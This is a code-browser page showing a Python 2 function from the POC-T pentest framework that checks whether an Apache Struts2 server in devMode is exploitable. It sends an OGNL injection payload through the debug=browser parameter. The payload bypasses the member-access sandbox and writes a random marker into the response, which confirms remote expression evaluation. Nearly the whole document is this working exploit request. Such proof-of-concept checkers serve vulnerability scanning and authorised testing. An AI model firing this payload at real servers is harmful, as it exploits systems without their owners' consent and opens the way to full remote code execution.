hub / github.com/Xyntax/POC-T / poc

Function poc

script/struts2-devmode.py:21–37
(url)

Source from the content-addressed store, hash-verified

def poc(url):
    # Normalise the target: default to http:// and drop any query string.
    if '://' not in url:
        url = 'http://' + url
    if '?' in url:
        url = url.split('?')[0]
    if '.action' not in url:
        url = redirectURL(url)
    # Random marker that the debug=browser handler is asked to write into the response.
    key = randomString()
    payload = "?debug=browser&object=(%23mem=%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f%23context[%23parameters.rpsobj[0]].getWriter().println(%23parameters.content[0]):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=" + key
    target = (url + payload)
    try:
        c = requests.get(target, headers={'User-Agent': firefox()}, timeout=5).content
        # Marker present but the rpsobj class name absent: the expression was
        # evaluated rather than the query string simply being echoed back.
        if key in c and 'xwork2.dispatcher' not in c:
            return url
    except Exception, e:  # Python 2 syntax, as in the project source
        return False
    return False

Callers

nothing calls this directly

Calls 5

redirectURL · Function · 0.90
randomString · Function · 0.90
firefox · Function · 0.90
split · Method · 0.80
get · Method · 0.80

Tested by

no test coverage detected